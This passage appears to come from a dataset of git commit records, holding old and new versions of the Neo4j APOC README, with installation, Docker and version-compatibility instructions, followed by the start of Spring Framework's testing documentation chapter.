Neo4j instance, and then be called from Cypher directly.\n\nThe APOC library consists of many (about 450) procedures and functions to help with many different tasks in areas like data integration, graph algorithms or data conversion.\n\/\/ end::intro-text[]\n\n=== License\n\nApache License 2.0\n\n\/\/ tag::name-history[]\n=== \"APOC\" Name history\n\n\/\/ tag::name-history-text[]\nhttp:\/\/matrix.wikia.com\/wiki\/Apoc[Apoc^] was the technician and driver on board of the Nebuchadnezzar in the Matrix movie. He was killed by Cypher.\n\n*APOC* was also the first bundled http:\/\/neo4j.com\/blog\/convenient-package-neo4j-apoc-0-1-released\/[A Package Of Component^] for Neo4j in 2009.\n\n*APOC* also stands for \"Awesome Procedures On Cypher\"\n\/\/ end::name-history-text[]\n\/\/ end::name-history[]\n\n\/\/ tag::install-desktop[]\n== Installation: With Neo4j Desktop\n\nAPOC is easily installed with http:\/\/neo4j.com\/download[Neo4j Desktop], after creating your database just go to the \"Manage\" screen and the \"Plugins\" tab.\nThen click \"Install\" in the APOC box and you're done.\n\n\/\/ end::install-desktop[]\nimage::{img}\/desktop-apoc.jpg[width=800]\n\n== Feedback\n\n\/\/ tag::feedback[]\nPlease provide feedback and report bugs as https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/issues[GitHub issues] or join the https:\/\/community.neo4j.com\/c\/neo4j-graph-platform\/procedures-apoc[Neo4j Community Forum and ask in the APOC & Procedures category^].\n\/\/ end::feedback[]\n\n\/\/ tag::calling-procedures[]\n\n== Calling Procedures & Functions within Cypher\n\n\/\/ tag::usage[]\nUser defined *Functions* can be used in *any* expression or predicate, just like built-in functions.\n\n*Procedures* can be called stand-alone with `CALL procedure.name();`\n\nBut you can also integrate them into your Cypher statements which makes them so much more powerful.\n\n.Load JSON example\n[source,cypher]\n----\nWITH 'https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/src\/test\/resources\/person.json' AS url\n\nCALL apoc.load.json(url) YIELD value as person\n\nMERGE (p:Person {name:person.name})\n ON CREATE SET p.age = person.age, p.children = size(person.children)\n----\n\/\/ end::usage[]\n\/\/ end::calling-procedures[]\n\n\/\/ end::intro[]\n\n\n== APOC Procedures & Functions Overview\n\nAll included procedures are listed in the link:{docs}\/overview[overview in the documentation^] and detailed in subsequent sections.\n\n=== Built in Help\n\n\/\/ tag::help[]\nimage::{img}\/apoc-help-apoc.jpg[width=600]\n\n\n[cols=\"1m,5\"]\n|===\n| call apoc.help('keyword') | lists name, description, signature, roles, based on keyword\n|===\n\n\/\/ end::help[]\n\n== Detailed Feature Documentation\n\nSee the link:{docs}[APOC User Guide^] for documentation of each of the major features of the library, including data import\/export, graph refactoring, data conversion, and more.\n\n\/\/ tag::signature[]\n\n== Procedure & Function Signatures\n\nTo call procedures correctly, you need to know their parameter names, types and positions.\nAnd for YIELDing their results, you have to know the output column names and types.\n\nINFO:The signatures are shown in error messages, if you use a procedure incorrectly.\n\nYou can see the procedures signature in the output of `CALL apoc.help(\"name\")`\n\n[source,cypher]\n----\nCALL apoc.help(\"dijkstra\")\n----\n\nThe signature is always `name : : TYPE`, so in this case:\n\n----\napoc.algo.dijkstra\n (startNode :: NODE?, endNode :: NODE?,\n relationshipTypesAndDirections :: STRING?, weightPropertyName :: STRING?)\n:: (path :: PATH?, weight :: FLOAT?)\n----\n\n.Parameter Explanation\n[opts=header,cols=\"m,m\"]\n|===\n| Name | Type\nh| Procedure Parameters |\n| startNode | Node\n| endNode | Node\n| relationshipTypesAndDirections | String\n| weightPropertyName | String\nh| Output Return Columns |\n| path | Path\n| weight | Float\n|===\n\n\/\/ end::signature[]\n\n\/\/ tag::install[]\n\n== Manual Installation: Download latest release\n\nSince APOC relies in some places on Neo4j's internal APIs you need to use the *matching APOC version* for your Neo4j installaton.\nMake sure that the *first two version numbers match between Neo4j and APOC*.\n\nGo to http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/{apoc-release}[the latest release] for *Neo4j version {branch}* and download the binary jar to place into your `$NEO4J_HOME\/plugins` folder.\n\nYou can find http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/[all releases here].\n\n\/\/ end::install[]\n\n== Manual Configuration\n\n\/\/ tag::warnings[]\n\n[WARNING]\n====\nProcedures that use internal APIs have to be allowed in `$NEO4J_HOME\/conf\/neo4j.conf` with, e.g. `+dbms.security.procedures.unrestricted=apoc.*+` for security reasons.\n\nIf you want to use this via docker, you need to amend `+-e NEO4J_dbms_security_procedures_unrestricted=apoc.\\\\\\*+` to your `docker run ...` command. \nThe three backslashes are necessary to prevent wildcard expansions.\n\nYou _can_ also whitelist procedures and functions in general to be loaded using: `+dbms.security.procedures.whitelist=apoc.coll.*,apoc.load.*+`\n====\n\n\/\/ end::warnings[]\n\n\/\/ tag::version-matrix[]\n=== Version Compatibility Matrix\n\nSince APOC relies in some places on Neo4j's internal APIs you need to use the right APOC version for your Neo4j installaton.\n\nAPOC uses a consistent versioning scheme: `<neo4j-version>.<apoc>` version. \nThe trailing `<apoc>` part of the version number will be incremented with every apoc release.\n\n[opts=header]\n|===\n|apoc version | neo4j version\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.5.0.5[3.5.0.5^] | 3.5.11 (3.5.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.4.0.4[3.4.0.6^] | 3.4.12 (3.4.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.3.0.4[3.3.0.4^] | 3.3.6 (3.3.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.2.3.6[3.2.3.6^] | 3.2.9 (3.2.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.1.3.9[3.1.3.9^] | 3.1.7 (3.1.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.0.8.6[3.0.8.6^] | 3.0.5-3.0.9 (3.0.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.5.0.0[3.5.0.0^] | 3.5.0-beta01\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.4.0.2[3.4.0.2^] | 3.4.5\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.3.0.3[3.3.0.3^] | 3.3.5\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.2.3.5[3.2.3.5^] | 3.2.3\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.1.3.8[3.1.3.8^] | 3.1.5\n|===\n\n\/\/ end::version-matrix[]\n=== Get APOC Version\n\nTo know your current `apoc` version you can use the *function* :\n\n[source,cypher]\n----\nRETURN apoc.version();\n----\n\n\/\/ tag::docker[]\n\n=== Using APOC with the Neo4j Docker image\n\nThe https:\/\/hub.docker.com\/_\/neo4j\/[Neo4j Docker image] allows to supply a volume for the `\/plugins` folder. \nDownload the APOC release matching your Neo4j version to local folder `plugins` and provide it as a data volume:\n\n[source,bash,subs=attributes]\n----\nmkdir plugins\npushd plugins\nwget https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/download\/{apoc-release}\/apoc-{apoc-release}-all.jar\npopd\ndocker run --rm -e NEO4J_AUTH=none -p 7474:7474 -v $PWD\/plugins:\/plugins -p 7687:7687 neo4j:{branch}\n----\n\nIf you want to pass custom apoc config to your Docker instance, you can use environment variables, like here:\n\n----\ndocker run \\\n -p 7474:7474 -p 7687:7687 \\\n -v $PWD\/data:\/data -v $PWD\/plugins:\/plugins \\\n --name neo4j-apoc \\\n -e NEO4J_apoc_export_file_enabled=true \\\n -e NEO4J_apoc_import_file_enabled=true \\\n -e NEO4J_apoc_import_file_use__neo4j__config=true \\\n neo4j\n----\n\n====\nIf you want to allow APOC's procedures that use internal APIs, you need to amend `+-e NEO4J_dbms_security_procedures_unrestricted=apoc.\\\\\\*+` to your `docker run ...` command. \nThe three backslashes are necessary to prevent wildcard expansions.\n====\n\n\/\/ end::docker[]\n\/\/ tag::build[]\n\n=== Build & install the current development branch from source\n\n----\ngit clone http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\ncd neo4j-apoc-procedures\n.\/gradlew shadow\ncp build\/libs\/apoc-<version>-all.jar $NEO4J_HOME\/plugins\/\n$NEO4J_HOME\/bin\/neo4j restart\n----\n\n\/\/ If you want to run embedded or use neo4j-shell on a disk store, configure your `plugins` directory in `conf\/neo4j.conf` with `dbms.plugin.directory=path\/to\/plugins`.\n\nA full build including running the tests can be run by `.\/gradlew build`.\n\n\/\/ end::build[]\n","old_contents":":readme:\n:branch: 3.5\n:docs: https:\/\/neo4j.com\/docs\/labs\/apoc\/current\n:apoc-release: 3.5.0.4\n:neo4j-version: 3.5.6\n:img: https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/docs\/images\n\n= Awesome Procedures for Neo4j {branch}.x\n\n\/\/ tag::readme[]\n\n== Introduction\n\n\/\/ tag::intro[]\nimage::{img}\/apoc.gif[float=right]\n\n\/\/ tag::intro-text[]\nNeo4j 3.x introduced the concept of user-defined procedures and functions.\nThose are custom implementations of certain functionality, that can't be (easily) expressed in Cypher itself.\nThey are implemented in Java and can be easily deployed into your Neo4j instance, and then be called from Cypher directly.\n\nThe APOC library consists of many (about 450) procedures and functions to help with many different tasks in areas like data integration, graph algorithms or data conversion.\n\/\/ end::intro-text[]\n\n=== License\n\nApache License 2.0\n\n\/\/ tag::name-history[]\n=== \"APOC\" Name history\n\n\/\/ tag::name-history-text[]\nhttp:\/\/matrix.wikia.com\/wiki\/Apoc[Apoc^] was the technician and driver on board of the Nebuchadnezzar in the Matrix movie. He was killed by Cypher.\n\n*APOC* was also the first bundled http:\/\/neo4j.com\/blog\/convenient-package-neo4j-apoc-0-1-released\/[A Package Of Component^] for Neo4j in 2009.\n\n*APOC* also stands for \"Awesome Procedures On Cypher\"\n\/\/ end::name-history-text[]\n\/\/ end::name-history[]\n\n\/\/ tag::install-desktop[]\n== Installation: With Neo4j Desktop\n\nAPOC is easily installed with http:\/\/neo4j.com\/download[Neo4j Desktop], after creating your database just go to the \"Manage\" screen and the \"Plugins\" tab.\nThen click \"Install\" in the APOC box and you're done.\n\n\/\/ end::install-desktop[]\nimage::{img}\/desktop-apoc.jpg[width=800]\n\n== Feedback\n\n\/\/ tag::feedback[]\nPlease provide feedback and report bugs as https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/issues[GitHub issues] or join the https:\/\/community.neo4j.com\/c\/neo4j-graph-platform\/procedures-apoc[Neo4j Community Forum and ask in the APOC & Procedures category^].\n\/\/ end::feedback[]\n\n\/\/ tag::calling-procedures[]\n\n== Calling Procedures & Functions within Cypher\n\n\/\/ tag::usage[]\nUser defined *Functions* can be used in *any* expression or predicate, just like built-in functions.\n\n*Procedures* can be called stand-alone with `CALL procedure.name();`\n\nBut you can also integrate them into your Cypher statements which makes them so much more powerful.\n\n.Load JSON example\n[source,cypher]\n----\nWITH 'https:\/\/raw.githubusercontent.com\/neo4j-contrib\/neo4j-apoc-procedures\/{branch}\/src\/test\/resources\/person.json' AS url\n\nCALL apoc.load.json(url) YIELD value as person\n\nMERGE (p:Person {name:person.name})\n ON CREATE SET p.age = person.age, p.children = size(person.children)\n----\n\/\/ end::usage[]\n\/\/ end::calling-procedures[]\n\n\/\/ end::intro[]\n\n\n== APOC Procedures & Functions Overview\n\nAll included procedures are listed in the link:{docs}\/overview[overview in the documentation^] and detailed in subsequent sections.\n\n=== Built in Help\n\n\/\/ tag::help[]\nimage::{img}\/apoc-help-apoc.jpg[width=600]\n\n\n[cols=\"1m,5\"]\n|===\n| call apoc.help('keyword') | lists name, description, signature, roles, based on keyword\n|===\n\n\/\/ end::help[]\n\n== Detailed Feature Documentation\n\nSee the link:{docs}[APOC User Guide^] for documentation of each of the major features of the library, including data import\/export, graph refactoring, data conversion, and more.\n\n\/\/ tag::signature[]\n\n== Procedure & Function Signatures\n\nTo call procedures correctly, you need to know their parameter names, types and positions.\nAnd for YIELDing their results, you have to know the output column names and types.\n\nINFO:The signatures are shown in error messages, if you use a procedure incorrectly.\n\nYou can see the procedures signature in the output of `CALL apoc.help(\"name\")`\n\n[source,cypher]\n----\nCALL apoc.help(\"dijkstra\")\n----\n\nThe signature is always `name : : TYPE`, so in this case:\n\n----\napoc.algo.dijkstra\n (startNode :: NODE?, endNode :: NODE?,\n relationshipTypesAndDirections :: STRING?, weightPropertyName :: STRING?)\n:: (path :: PATH?, weight :: FLOAT?)\n----\n\n.Parameter Explanation\n[opts=header,cols=\"m,m\"]\n|===\n| Name | Type\nh| Procedure Parameters |\n| startNode | Node\n| endNode | Node\n| relationshipTypesAndDirections | String\n| weightPropertyName | String\nh| Output Return Columns |\n| path | Path\n| weight | Float\n|===\n\n\/\/ end::signature[]\n\n\/\/ tag::install[]\n\n== Manual Installation: Download latest release\n\nSince APOC relies in some places on Neo4j's internal APIs you need to use the *matching APOC version* for your Neo4j installaton.\nMake sure that the *first two version numbers match between Neo4j and APOC*.\n\nGo to http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/{apoc-release}[the latest release] for *Neo4j version {branch}* and download the binary jar to place into your `$NEO4J_HOME\/plugins` folder.\n\nYou can find http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/[all releases here].\n\n\/\/ end::install[]\n\n== Manual Configuration\n\n\/\/ tag::warnings[]\n\n[WARNING]\n====\nProcedures that use internal APIs have to be allowed in `$NEO4J_HOME\/conf\/neo4j.conf` with, e.g. `+dbms.security.procedures.unrestricted=apoc.*+` for security reasons.\n\nIf you want to use this via docker, you need to amend `+-e NEO4J_dbms_security_procedures_unrestricted=apoc.\\\\\\*+` to your `docker run ...` command. \nThe three backslashes are necessary to prevent wildcard expansions.\n\nYou _can_ also whitelist procedures and functions in general to be loaded using: `+dbms.security.procedures.whitelist=apoc.coll.*,apoc.load.*+`\n====\n\n\/\/ end::warnings[]\n\n\/\/ tag::version-matrix[]\n=== Version Compatibility Matrix\n\nSince APOC relies in some places on Neo4j's internal APIs you need to use the right APOC version for your Neo4j installaton.\n\nAPOC uses a consistent versioning scheme: `<neo4j-version>.<apoc>` version. \nThe trailing `<apoc>` part of the version number will be incremented with every apoc release.\n\n[opts=header]\n|===\n|apoc version | neo4j version\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.5.0.4[3.5.0.4^] | 3.5.6 (3.5.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.4.0.4[3.4.0.6^] | 3.4.12 (3.4.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.3.0.4[3.3.0.4^] | 3.3.6 (3.3.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.2.3.6[3.2.3.6^] | 3.2.9 (3.2.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.1.3.9[3.1.3.9^] | 3.1.7 (3.1.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.0.8.6[3.0.8.6^] | 3.0.5-3.0.9 (3.0.x)\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.5.0.0[3.5.0.0^] | 3.5.0-beta01\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.4.0.2[3.4.0.2^] | 3.4.5\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.3.0.3[3.3.0.3^] | 3.3.5\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.2.3.5[3.2.3.5^] | 3.2.3\n| http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/3.1.3.8[3.1.3.8^] | 3.1.5\n|===\n\n\/\/ end::version-matrix[]\n=== Get APOC Version\n\nTo know your current `apoc` version you can use the *function* :\n\n[source,cypher]\n----\nRETURN apoc.version();\n----\n\n\/\/ tag::docker[]\n\n=== Using APOC with the Neo4j Docker image\n\nThe https:\/\/hub.docker.com\/_\/neo4j\/[Neo4j Docker image] allows to supply a volume for the `\/plugins` folder. \nDownload the APOC release matching your Neo4j version to local folder `plugins` and provide it as a data volume:\n\n[source,bash,subs=attributes]\n----\nmkdir plugins\npushd plugins\nwget https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\/releases\/download\/{apoc-release}\/apoc-{apoc-release}-all.jar\npopd\ndocker run --rm -e NEO4J_AUTH=none -p 7474:7474 -v $PWD\/plugins:\/plugins -p 7687:7687 neo4j:{branch}\n----\n\nIf you want to pass custom apoc config to your Docker instance, you can use environment variables, like here:\n\n----\ndocker run \\\n -p 7474:7474 -p 7687:7687 \\\n -v $PWD\/data:\/data -v $PWD\/plugins:\/plugins \\\n --name neo4j-apoc \\\n -e NEO4J_apoc_export_file_enabled=true \\\n -e NEO4J_apoc_import_file_enabled=true \\\n -e NEO4J_apoc_import_file_use__neo4j__config=true \\\n neo4j\n----\n\n====\nIf you want to allow APOC's procedures that use internal APIs, you need to amend `+-e NEO4J_dbms_security_procedures_unrestricted=apoc.\\\\\\*+` to your `docker run ...` command. \nThe three backslashes are necessary to prevent wildcard expansions.\n====\n\n\/\/ end::docker[]\n\/\/ tag::build[]\n\n=== Build & install the current development branch from source\n\n----\ngit clone http:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures\ncd neo4j-apoc-procedures\n.\/gradlew shadow\ncp build\/libs\/apoc-<version>-all.jar $NEO4J_HOME\/plugins\/\n$NEO4J_HOME\/bin\/neo4j restart\n----\n\n\/\/ If you want to run embedded or use neo4j-shell on a disk store, configure your `plugins` directory in `conf\/neo4j.conf` with `dbms.plugin.directory=path\/to\/plugins`.\n\nA full build including running the tests can be run by `.\/gradlew build`.\n\n\/\/ end::build[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2408e2515a48a6eb49048ffe1ecd24cb9067ac0c","subject":"Escape hashtag in Testing chapter to disable Asciidoc highlighting","message":"Escape hashtag in Testing chapter to disable Asciidoc highlighting\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/docs\/asciidoc\/testing.adoc","new_file":"src\/docs\/asciidoc\/testing.adoc","new_contents":"[[testing]]\n= Testing\n:doc-root: https:\/\/docs.spring.io\n:api-spring-framework: {doc-root}\/spring-framework\/docs\/{spring-version}\/javadoc-api\/org\/springframework\n:doc-spring-boot: {doc-root}\/spring-boot\/docs\/current\/reference\n:toc: left\n:toclevels: 2\n:docinfo1:\n\nThe adoption of the test-driven-development (TDD) approach to software\ndevelopment is certainly advocated by the Spring team, and so coverage of Spring's\nsupport for integration testing is covered (alongside best practices for unit testing).\nThe Spring team has found that the correct use of IoC certainly does make both unit and\nintegration testing easier (in that the presence of setter methods and appropriate\nconstructors on classes makes them easier to wire together in a test without having to\nset up service locator registries and suchlike)... the chapter dedicated solely to\ntesting will hopefully convince you of this as well.\n\n\n[[testing-introduction]]\n== Introduction to Spring Testing\nTesting is an integral part of enterprise software development. This chapter focuses on\nthe value-add of the IoC principle to <<unit-testing,unit testing>> and on the benefits\nof the Spring Framework's support for <<integration-testing,integration testing>>. __(A\nthorough treatment of testing in the enterprise is beyond the scope of this reference\nmanual.)__\n\n\n[[unit-testing]]\n== Unit Testing\nDependency Injection should make your code less dependent on the container than it would\nbe with traditional Java EE development. The POJOs that make up your application should\nbe testable in JUnit or TestNG tests, with objects simply instantiated using the `new`\noperator, __without Spring or any other container__. You can use <<mock-objects,mock\nobjects>> (in conjunction with other valuable testing techniques) to test your code in\nisolation. If you follow the architecture recommendations for Spring, the resulting\nclean layering and componentization of your codebase will facilitate easier unit\ntesting. For example, you can test service layer objects by stubbing or mocking DAO or\nRepository interfaces, without needing to access persistent data while running unit\ntests.\n\nTrue unit tests typically run extremely quickly, as there is no runtime infrastructure\nto set up. Emphasizing true unit tests as part of your development methodology will\nboost your productivity. You may not need this section of the testing chapter to help\nyou write effective unit tests for your IoC-based applications. For certain unit testing\nscenarios, however, the Spring Framework provides the following mock objects and testing\nsupport classes.\n\n\n\n[[mock-objects]]\n=== Mock Objects\n\n\n[[mock-objects-env]]\n==== Environment\nThe `org.springframework.mock.env` package contains mock implementations of the\n`Environment` and `PropertySource` abstractions (see\n<<core.adoc#beans-definition-profiles, Bean definition profiles>>\nand <<core.adoc#beans-property-source-abstraction, PropertySource abstraction>>).\n`MockEnvironment` and `MockPropertySource` are useful for developing\n__out-of-container__ tests for code that depends on environment-specific properties.\n\n\n[[mock-objects-jndi]]\n==== JNDI\nThe `org.springframework.mock.jndi` package contains an implementation of the JNDI SPI,\nwhich you can use to set up a simple JNDI environment for test suites or stand-alone\napplications. If, for example, JDBC ``DataSource``s get bound to the same JNDI names in\ntest code as within a Java EE container, you can reuse both application code and\nconfiguration in testing scenarios without modification.\n\n\n[[mock-objects-servlet]]\n==== Servlet API\nThe `org.springframework.mock.web` package contains a comprehensive set of Servlet API\nmock objects, which are useful for testing web contexts, controllers, and filters. These\nmock objects are targeted at usage with Spring's Web MVC framework and are generally more\nconvenient to use than dynamic mock objects such as http:\/\/www.easymock.org[EasyMock] or\nalternative Servlet API mock objects such as http:\/\/www.mockobjects.com[MockObjects]. Since\nSpring Framework 5.0, the set of mocks in the `org.springframework.mock.web` package is\nbased on the Servlet 4.0 API.\n\nFor thorough integration testing of your Spring MVC and REST ``Controller``s in\nconjunction with your `WebApplicationContext` configuration for Spring MVC, see the\n<<spring-mvc-test-framework,_Spring MVC Test Framework_>>.\n\n\n\n[[unit-testing-support-classes]]\n=== Unit Testing support Classes\n\n\n[[unit-testing-utilities]]\n==== General testing utilities\nThe `org.springframework.test.util` package contains several general purpose utilities\nfor use in unit and integration testing.\n\n`ReflectionTestUtils` is a collection of reflection-based utility methods. Developers use\nthese methods in testing scenarios where they need to change the value of a constant, set\na non-`public` field, invoke a non-`public` setter method, or invoke a non-`public`\n_configuration_ or _lifecycle_ callback method when testing application code involving\nuse cases such as the following.\n\n* ORM frameworks such as JPA and Hibernate that condone `private` or `protected` field\n access as opposed to `public` setter methods for properties in a domain entity.\n* Spring's support for annotations such as `@Autowired`, `@Inject`, and `@Resource`,\n which provides dependency injection for `private` or `protected` fields, setter\n methods, and configuration methods.\n* Use of annotations such as `@PostConstruct` and `@PreDestroy` for lifecycle callback\n methods.\n\n`AopTestUtils` is a collection of AOP-related utility methods. These methods can be used\nto obtain a reference to the underlying target object hidden behind one or more Spring\nproxies. For example, if you have configured a bean as a dynamic mock using a library\nlike EasyMock or Mockito and the mock is wrapped in a Spring proxy, you may need direct\naccess to the underlying mock in order to configure expectations on it and perform\nverifications. For Spring's core AOP utilities, see `AopUtils` and `AopProxyUtils`.\n\n\n\n[[unit-testing-spring-mvc]]\n==== Spring MVC\nThe `org.springframework.test.web` package contains `ModelAndViewAssert`, which you can\nuse in combination with JUnit, TestNG, or any other testing framework for unit tests\ndealing with Spring MVC `ModelAndView` objects.\n\n.Unit testing Spring MVC Controllers\n[TIP]\n====\nTo unit test your Spring MVC ``Controller``s as POJOs, use `ModelAndViewAssert` combined\nwith `MockHttpServletRequest`, `MockHttpSession`, and so on from Spring's\n<<mock-objects-servlet, Servlet API mocks>>. For thorough integration testing of your\nSpring MVC and REST ``Controller``s in conjunction with your `WebApplicationContext`\nconfiguration for Spring MVC, use the <<spring-mvc-test-framework,_Spring MVC Test\nFramework_>> instead.\n====\n\n\n\n\n[[integration-testing]]\n== Integration Testing\n\n\n\n[[integration-testing-overview]]\n=== Overview\nIt is important to be able to perform some integration testing without requiring\ndeployment to your application server or connecting to other enterprise infrastructure.\nThis will enable you to test things such as:\n\n* The correct wiring of your Spring IoC container contexts.\n* Data access using JDBC or an ORM tool. This would include such things as the\n correctness of SQL statements, Hibernate queries, JPA entity mappings, etc.\n\nThe Spring Framework provides first-class support for integration testing in the\n`spring-test` module. The name of the actual JAR file might include the release version\nand might also be in the long `org.springframework.test` form, depending on where you\nget it from (see the <<core.adoc#dependency-management,section on Dependency Management>> for an\nexplanation). This library includes the `org.springframework.test` package, which\ncontains valuable classes for integration testing with a Spring container. This testing\ndoes not rely on an application server or other deployment environment. Such tests are\nslower to run than unit tests but much faster than the equivalent Selenium tests or remote\ntests that rely on deployment to an application server.\n\nIn Spring 2.5 and later, unit and integration testing support is provided in the form of\nthe annotation-driven <<testcontext-framework,Spring TestContext Framework>>. The\nTestContext framework is agnostic of the actual testing framework in use, thus allowing\ninstrumentation of tests in various environments including JUnit, TestNG, and so on.\n\n\n\n[[integration-testing-goals]]\n=== Goals of Integration Testing\nSpring's integration testing support has the following primary goals:\n\n* To manage <<testing-ctx-management,Spring IoC container caching>> between test\n execution.\n* To provide <<testing-fixture-di,Dependency Injection of test fixture instances>>.\n* To provide <<testing-tx,transaction management>> appropriate to integration testing.\n* To supply <<testing-support-classes,Spring-specific base classes>> that assist\n developers in writing integration tests.\n\nThe next few sections describe each goal and provide links to implementation and\nconfiguration details.\n\n\n[[testing-ctx-management]]\n==== Context management and caching\nThe Spring TestContext Framework provides consistent loading of Spring\n``ApplicationContext``s and ``WebApplicationContext``s as well as caching of those\ncontexts. Support for the caching of loaded contexts is important, because startup time\ncan become an issue -- not because of the overhead of Spring itself, but because the\nobjects instantiated by the Spring container take time to instantiate. For example, a\nproject with 50 to 100 Hibernate mapping files might take 10 to 20 seconds to load the\nmapping files, and incurring that cost before running every test in every test fixture\nleads to slower overall test runs that reduce developer productivity.\n\nTest classes typically declare either an array of __resource locations__ for XML or Groovy\nconfiguration metadata -- often in the classpath -- or an array of __annotated classes__\nthat is used to configure the application. These locations or classes are the same as or\nsimilar to those specified in `web.xml` or other configuration files for production\ndeployments.\n\nBy default, once loaded, the configured `ApplicationContext` is reused for each test.\nThus the setup cost is incurred only once per test suite, and subsequent test execution\nis much faster. In this context, the term __test suite__ means all tests run in the same\nJVM -- for example, all tests run from an Ant, Maven, or Gradle build for a given\nproject or module. In the unlikely case that a test corrupts the application context and\nrequires reloading -- for example, by modifying a bean definition or the state of an\napplication object -- the TestContext framework can be configured to reload the\nconfiguration and rebuild the application context before executing the next test.\n\nSee <<testcontext-ctx-management>> and <<testcontext-ctx-management-caching>> with the\nTestContext framework.\n\n\n[[testing-fixture-di]]\n==== Dependency Injection of test fixtures\nWhen the TestContext framework loads your application context, it can optionally\nconfigure instances of your test classes via Dependency Injection. This provides a\nconvenient mechanism for setting up test fixtures using preconfigured beans from your\napplication context. A strong benefit here is that you can reuse application contexts\nacross various testing scenarios (e.g., for configuring Spring-managed object graphs,\ntransactional proxies, ``DataSource``s, etc.), thus avoiding the need to duplicate\ncomplex test fixture setup for individual test cases.\n\nAs an example, consider the scenario where we have a class, `HibernateTitleRepository`,\nthat implements data access logic for a `Title` domain entity. We want to write\nintegration tests that test the following areas:\n\n* The Spring configuration: basically, is everything related to the configuration of the\n `HibernateTitleRepository` bean correct and present?\n* The Hibernate mapping file configuration: is everything mapped correctly, and are the\n correct lazy-loading settings in place?\n* The logic of the `HibernateTitleRepository`: does the configured instance of this\n class perform as anticipated?\n\nSee dependency injection of test fixtures with the <<testcontext-fixture-di,TestContext\nframework>>.\n\n\n[[testing-tx]]\n==== Transaction management\nOne common issue in tests that access a real database is their effect on the state of\nthe persistence store. Even when you're using a development database, changes to the\nstate may affect future tests. Also, many operations -- such as inserting or modifying\npersistent data -- cannot be performed (or verified) outside a transaction.\n\nThe TestContext framework addresses this issue. By default, the framework will create\nand roll back a transaction for each test. You simply write code that can assume the\nexistence of a transaction. If you call transactionally proxied objects in your tests,\nthey will behave correctly, according to their configured transactional semantics. In\naddition, if a test method deletes the contents of selected tables while running within\nthe transaction managed for the test, the transaction will roll back by default, and the\ndatabase will return to its state prior to execution of the test. Transactional support\nis provided to a test via a `PlatformTransactionManager` bean defined in the test's\napplication context.\n\nIf you want a transaction to commit -- unusual, but occasionally useful when you want a\nparticular test to populate or modify the database -- the TestContext framework can be\ninstructed to cause the transaction to commit instead of roll back via the\n<<integration-testing-annotations, `@Commit`>> annotation.\n\nSee transaction management with the <<testcontext-tx,TestContext framework>>.\n\n\n[[testing-support-classes]]\n==== Support classes for integration testing\nThe Spring TestContext Framework provides several `abstract` support classes that\nsimplify the writing of integration tests. These base test classes provide well-defined\nhooks into the testing framework as well as convenient instance variables and methods,\nwhich enable you to access:\n\n* The `ApplicationContext`, for performing explicit bean lookups or testing the state of\n the context as a whole.\n* A `JdbcTemplate`, for executing SQL statements to query the database. Such queries can\n be used to confirm database state both __prior to__ and __after__ execution of\n database-related application code, and Spring ensures that such queries run in the\n scope of the same transaction as the application code. When used in conjunction with\n an ORM tool, be sure to avoid <<testcontext-tx-false-positives,false positives>>.\n\nIn addition, you may want to create your own custom, application-wide superclass with\ninstance variables and methods specific to your project.\n\nSee support classes for the <<testcontext-support-classes,TestContext framework>>.\n\n\n\n[[integration-testing-support-jdbc]]\n=== JDBC Testing Support\nThe `org.springframework.test.jdbc` package contains `JdbcTestUtils`, which is a\ncollection of JDBC related utility functions intended to simplify standard database\ntesting scenarios. Specifically, `JdbcTestUtils` provides the following static utility\nmethods.\n\n* `countRowsInTable(..)`: counts the number of rows in the given table\n* `countRowsInTableWhere(..)`: counts the number of rows in the given table, using\nthe provided `WHERE` clause\n* `deleteFromTables(..)`: deletes all rows from the specified tables\n* 